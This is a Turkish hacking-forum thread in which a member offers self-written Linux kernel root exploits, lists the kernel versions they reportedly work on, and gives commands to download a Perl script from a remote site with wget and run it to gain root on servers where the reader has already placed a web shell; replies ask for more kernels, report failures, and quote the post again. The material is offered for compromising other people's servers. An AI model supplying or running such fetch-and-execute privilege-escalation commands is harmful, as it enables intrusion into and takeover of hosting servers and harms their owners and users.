2014-2015 Kendi Yazdığım Root Exploit Arşivim.

*-*Alpagu*-*

Uzman üye
10 Tem 2012
1,866
2
Ankara / Zürih
Merhaba arkadaşlar,

Bilirsiniz ki permler kapalıysa üstüne cloudlinux yada litespeed ise permlerde açıksa yapacak tek iş root kernel derlemek yada derlenmiş root kernelleri kullanmak :)

Nasıl yazdın konusuna girmeyin sıkıcıdır ama isteyen arkadaşlara temelini anlatabilirim.

Kernellerin Çalıştıkları Sürümler, Yani elimden geldiğince test edebildiklerim.

->
2.6.32-531 2014 x86
->2.6.32-408 2015 x86_64
->2.6.32 Yinede denemenizde fayda var. Hepsinde çalışmıyor.
->3.18-24 2014 x86
->3.20-240lve (Hostgator cloud) 2014
->
2.6.32-504.16.2.el6.x86_64 #1 SMP Wed Apr 22 06:48:29 UTC 2015 x86_64
->2.6.32-504.1.3.el6.x86_64 #1 SMP Tue Nov 11 17:57:25 UTC 2014 x86_64
->
3.10.23-xxxx-std-ipv6-64 #1 SMP Tue Mar 18 14:48:24 CET 2014 x86_64
->
2.6.18-498.el5.lve0.8.80 #1 SMP Fri Dec 19 10:25:14 EST 2014 x86_64
->2.6.18
->2.6.36

Sonuna eklemediklerim de, bazı uygulamaların yüklü olmadığı takdirde çalışmıyor. Belki exploitteki bug lu uygulama başka serverlarda da vardı diyerek denemenizi tavsiye ediyorum.

----------Auto Root----------
Command lane ile önce şu dosyayı sunucuya çekiyoruz.
Kod:
wget http://bilgiguvenligiakademisi.org/root/myroot.pl
ardından,
Kod:
perl myroot.pl
rootlanmış ise root yazacaktır.
-----------------------------

Ayrıyetten bana ait olmayan ancak 2012-2013-2014-2015 sürümleri için genel olarak geçerli olan C dosyalarıda bulunuyor denemek isteyen arkadaslarda, shell attıkları sunucuya çekip derleyebilirler.

Exploit Linki->Tıkla

Ekstra: İstediğiniz kerneller için root exploit isterseniz, konu altına yazabilirsiniz. Elimdn geldiğince yardımcı olmaya calısırım.
 
Son düzenleme:

The Madman

Katılımcı Üye
22 May 2014
491
0
34
Böyle bir şey arıyordum teşekkürler.
Bir de 3.19 uncu sürüm kernel için yazarsanız sevinirim.
 

Suhat34

Yeni üye
18 Eyl 2010
1
0
Kardeş Root Olmadı Kernel Sürümü 2.6.32-504.16.2.el6.x86_64 Lütfen Hocam Yardım Edin
 

*-*Alpagu*-*

Uzman üye
10 Tem 2012
1,866
2
Ankara / Zürih

*-*Alpagu*-*

Uzman üye
10 Tem 2012
1,866
2
Ankara / Zürih
fake exp indirmeyin boşa ölü

Fake exp mi ? Ya kardeşim kernel ne öğren ardından gel ve de ki, fake exploit. Kendi yazdığım exploitlerin neresi fake söylermisin ? Dünyada ki kernel sayısı söylermisin bana ? +100.000 olarak biliniyor. Benim yazdıklarım bunların hepisini rootlayacağını mı zannediyorsun ? + Olarak şikayet edildin.
 

Themakarov

Yeni üye
29 Mar 2013
7
0
Merhaba arkadaşlar,

Bilirsiniz ki permler kapalıysa üstüne cloudlinux yada litespeed ise permlerde açıksa yapacak tek iş root kernel derlemek yada derlenmiş root kernelleri kullanmak :)

Nasıl yazdın konusuna girmeyin sıkıcıdır ama isteyen arkadaşlara temelini anlatabilirim.

Kernellerin Çalıştıkları Sürümler, Yani elimden geldiğince test edebildiklerim.

->
2.6.32-531 2014 x86
->2.6.32-408 2015 x86_64
->2.6.32 Yinede denemenizde fayda var. Hepsinde çalışmıyor.
->3.18-24 2014 x86
->3.20-240lve (Hostgator cloud) 2014
->
2.6.32-504.16.2.el6.x86_64 #1 SMP Wed Apr 22 06:48:29 UTC 2015 x86_64
->2.6.32-504.1.3.el6.x86_64 #1 SMP Tue Nov 11 17:57:25 UTC 2014 x86_64
->
3.10.23-xxxx-std-ipv6-64 #1 SMP Tue Mar 18 14:48:24 CET 2014 x86_64
->
2.6.18-498.el5.lve0.8.80 #1 SMP Fri Dec 19 10:25:14 EST 2014 x86_64
->2.6.18
->2.6.36

Sonuna eklemediklerim de, bazı uygulamaların yüklü olmadığı takdirde çalışmıyor. Belki exploitteki bug lu uygulama başka serverlarda da vardı diyerek denemenizi tavsiye ediyorum.

----------Auto Root----------
Command lane ile önce şu dosyayı sunucuya çekiyoruz.
Kod:
wget http://bilgiguvenligiakademisi.org/root/myroot.pl
ardından,
Kod:
perl myroot.pl
rootlanmış ise root yazacaktır.
-----------------------------

Ayrıyetten bana ait olmayan ancak 2012-2013-2014-2015 sürümleri için genel olarak geçerli olan C dosyalarıda bulunuyor denemek isteyen arkadaslarda, shell attıkları sunucuya çekip derleyebilirler.

Exploit Linki->Tıkla

Ekstra: İstediğiniz kerneller için root exploit isterseniz, konu altına yazabilirsiniz. Elimdn geldiğince yardımcı olmaya calısırım.
linkleri yenile kardeşim
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.